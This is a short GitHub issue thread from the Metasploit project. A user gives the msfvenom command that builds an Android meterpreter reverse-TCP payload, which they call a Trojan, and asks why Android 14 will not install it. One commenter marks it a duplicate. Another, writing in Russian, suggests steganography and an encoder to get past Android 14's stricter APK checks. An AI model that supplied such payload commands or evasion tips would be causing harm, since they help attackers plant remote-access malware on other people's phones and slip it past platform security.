### ISSUE TITLE
About Android 14 Incompatibility Issue

### ISSUE THREAD

**Issue by TWXiao0616** [rapid7/metasploit-framework#19224]
I used the command:
```
msfvenom -p android/meterpreter/reverse_tcp LHOST=<This is the external IP, so I've pixelated it.> LPORT=80 -o ~/Desktop/test.apk
``` 
to generate a Trojan program. When trying to install it on Android, it shows "The application is incompatible with your phone, so installation could not be completed." How should I solve this issue? (This article was written by a translator, so there may be some translation issues.)

**Comment by h00die** [comment]
#19154 duplicate

**Comment by Scaybought** [comment]
Попробуйте изпользовать стеганографию и encoder. Я тоже сталкивался с этой проблемой так как в android 14 улучшили систему безопасности, и сделали более агрессивную проверку apk
